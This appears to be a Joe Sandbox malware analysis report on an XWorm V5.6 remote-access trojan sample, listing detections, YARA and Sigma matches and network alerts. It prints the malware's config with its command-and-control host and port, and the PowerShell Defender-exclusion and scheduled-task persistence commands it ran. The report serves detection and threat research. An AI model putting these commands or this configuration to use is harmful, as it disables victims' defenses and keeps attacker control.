Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ANuh30XoVu.exe

Overview

General Information

Sample name:ANuh30XoVu.exe
renamed because original name is a hash value
Original sample name:a8bd024f05a7430ed667070ea680d7b4f80dc0d6a2cf6149874a1d784aa5b47e.exe
Analysis ID:1583090
MD5:c0d9a8b29b80a47cbd0963f5dc1a8266
SHA1:4d7ef477523c72e0c03d235038669b974b7f6d31
SHA256:a8bd024f05a7430ed667070ea680d7b4f80dc0d6a2cf6149874a1d784aa5b47e
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ANuh30XoVu.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\ANuh30XoVu.exe" MD5: C0D9A8B29B80A47CBD0963F5DC1A8266)
    • powershell.exe (PID: 2004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ANuh30XoVu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1220 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SYSTEM (PID: 6292 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: C0D9A8B29B80A47CBD0963F5DC1A8266)
  • SYSTEM (PID: 4140 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: C0D9A8B29B80A47CBD0963F5DC1A8266)
  • SYSTEM (PID: 2252 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: C0D9A8B29B80A47CBD0963F5DC1A8266)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["pro-favorite.gl.at.ply.gg"], "Port": 56526, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ANuh30XoVu.exeJoeSecurity_XWormYara detected XWormJoe Security
    ANuh30XoVu.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      ANuh30XoVu.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xb546:$str01: $VB$Local_Port
      • 0xb5b7:$str02: $VB$Local_Host
      • 0x9b71:$str03: get_Jpeg
      • 0xa087:$str04: get_ServicePack
      • 0xcb40:$str05: Select * from AntivirusProduct
      • 0xd324:$str06: PCRestart
      • 0xd338:$str07: shutdown.exe /f /r /t 0
      • 0xd3ea:$str08: StopReport
      • 0xd3c0:$str09: StopDDos
      • 0xd4b6:$str10: sendPlugin
      • 0xd636:$str12: -ExecutionPolicy Bypass -File "
      • 0xdb93:$str13: Content-length: 5235
      ANuh30XoVu.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xc660:$s6: VirtualBox
      • 0xc5be:$s8: Win32_ComputerSystem
      • 0xe5ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xe66b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xe780:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xdaae:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\SYSTEMJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\SYSTEMJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\SYSTEMrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0xb546:$str01: $VB$Local_Port
          • 0xb5b7:$str02: $VB$Local_Host
          • 0x9b71:$str03: get_Jpeg
          • 0xa087:$str04: get_ServicePack
          • 0xcb40:$str05: Select * from AntivirusProduct
          • 0xd324:$str06: PCRestart
          • 0xd338:$str07: shutdown.exe /f /r /t 0
          • 0xd3ea:$str08: StopReport
          • 0xd3c0:$str09: StopDDos
          • 0xd4b6:$str10: sendPlugin
          • 0xd636:$str12: -ExecutionPolicy Bypass -File "
          • 0xdb93:$str13: Content-length: 5235
          C:\Users\user\AppData\Roaming\SYSTEMMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xc660:$s6: VirtualBox
          • 0xc5be:$s8: Win32_ComputerSystem
          • 0xe5ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xe66b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xe780:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xdaae:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xc460:$s6: VirtualBox
            • 0xc3be:$s8: Win32_ComputerSystem
            • 0xe3ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xe46b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xe580:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xd8ae:$cnc4: POST / HTTP/1.1
            00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              Process Memory Space: ANuh30XoVu.exe PID: 6936JoeSecurity_XWormYara detected XWormJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.ANuh30XoVu.exe.f30000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.ANuh30XoVu.exe.f30000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.ANuh30XoVu.exe.f30000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                    • 0xb546:$str01: $VB$Local_Port
                    • 0xb5b7:$str02: $VB$Local_Host
                    • 0x9b71:$str03: get_Jpeg
                    • 0xa087:$str04: get_ServicePack
                    • 0xcb40:$str05: Select * from AntivirusProduct
                    • 0xd324:$str06: PCRestart
                    • 0xd338:$str07: shutdown.exe /f /r /t 0
                    • 0xd3ea:$str08: StopReport
                    • 0xd3c0:$str09: StopDDos
                    • 0xd4b6:$str10: sendPlugin
                    • 0xd636:$str12: -ExecutionPolicy Bypass -File "
                    • 0xdb93:$str13: Content-length: 5235
                    0.0.ANuh30XoVu.exe.f30000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xc660:$s6: VirtualBox
                    • 0xc5be:$s8: Win32_ComputerSystem
                    • 0xe5ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xe66b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xe780:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xdaae:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ANuh30XoVu.exe", ParentImage: C:\Users\user\Desktop\ANuh30XoVu.exe, ParentProcessId: 6936, ParentProcessName: ANuh30XoVu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', ProcessId: 2004, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ANuh30XoVu.exe", ParentImage: C:\Users\user\Desktop\ANuh30XoVu.exe, ParentProcessId: 6936, ParentProcessName: ANuh30XoVu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', ProcessId: 2004, ProcessName: powershell.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\SYSTEM, NewProcessName: C:\Users\user\AppData\Roaming\SYSTEM, OriginalFileName: C:\Users\user\AppData\Roaming\SYSTEM, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\SYSTEM, ProcessId: 6292, ProcessName: SYSTEM
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ANuh30XoVu.exe", ParentImage: C:\Users\user\Desktop\ANuh30XoVu.exe, ParentProcessId: 6936, ParentProcessName: ANuh30XoVu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', ProcessId: 2004, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\ANuh30XoVu.exe, ProcessId: 6936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ANuh30XoVu.exe", ParentImage: C:\Users\user\Desktop\ANuh30XoVu.exe, ParentProcessId: 6936, ParentProcessName: ANuh30XoVu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", ProcessId: 1220, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ANuh30XoVu.exe", ParentImage: C:\Users\user\Desktop\ANuh30XoVu.exe, ParentProcessId: 6936, ParentProcessName: ANuh30XoVu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ANuh30XoVu.exe', ProcessId: 2004, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:58:10.950298+010028559241Malware Command and Control Activity Detected192.168.2.449739147.185.221.2456526TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: ANuh30XoVu.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: pro-favorite.gl.at.ply.ggAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\SYSTEMAvira: detection malicious, Label: TR/Spy.Gen
                    Found malware configuration
                    Source: ANuh30XoVu.exeMalware Configuration Extractor: Xworm {"C2 url": ["pro-favorite.gl.at.ply.gg"], "Port": 56526, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\SYSTEMReversingLabs: Detection: 76%
                    Multi AV Scanner detection for submitted file
                    Source: ANuh30XoVu.exeReversingLabs: Detection: 76%
                    Source: ANuh30XoVu.exeVirustotal: Detection: 68%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\SYSTEMJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: ANuh30XoVu.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: ANuh30XoVu.exeString decryptor: pro-favorite.gl.at.ply.gg
                    Source: ANuh30XoVu.exeString decryptor: 56526
                    Source: ANuh30XoVu.exeString decryptor: <123456789>
                    Source: ANuh30XoVu.exeString decryptor: <Xwormmm>
                    Source: ANuh30XoVu.exeString decryptor: XWorm V5.6
                    Source: ANuh30XoVu.exeString decryptor: USB.exe
                    Source: ANuh30XoVu.exeString decryptor: %AppData%
                    Source: ANuh30XoVu.exeString decryptor: SYSTEM
                    Source: ANuh30XoVu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: ANuh30XoVu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 147.185.221.24:56526
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: pro-favorite.gl.at.ply.gg
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: ANuh30XoVu.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.185.221.24:56526
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: pro-favorite.gl.at.ply.gg
                    Source: ANuh30XoVu.exe, SYSTEM.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000001.00000002.1736972928.00000214DA590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1826514994.00000252F3790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1967813052.0000027B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.1722128488.00000214CA749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3948000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: ANuh30XoVu.exe, 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1722128488.00000214CA521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000001.00000002.1722128488.00000214CA749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3948000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000B.00000002.2194837469.0000023F1E3E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000000B.00000002.2194837469.0000023F1E3E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coiops
                    Source: powershell.exe, 00000001.00000002.1722128488.00000214CA521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1743651589.00000214E2AE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.535
                    Source: powershell.exe, 00000001.00000002.1736972928.00000214DA590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1826514994.00000252F3790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1967813052.0000027B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: ANuh30XoVu.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: ANuh30XoVu.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B775EF60_2_00007FFD9B775EF6
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B771DB10_2_00007FFD9B771DB1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B776CA20_2_00007FFD9B776CA2
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B771B2D0_2_00007FFD9B771B2D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8430E94_2_00007FFD9B8430E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8330E911_2_00007FFD9B8330E9
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B75103815_2_00007FFD9B751038
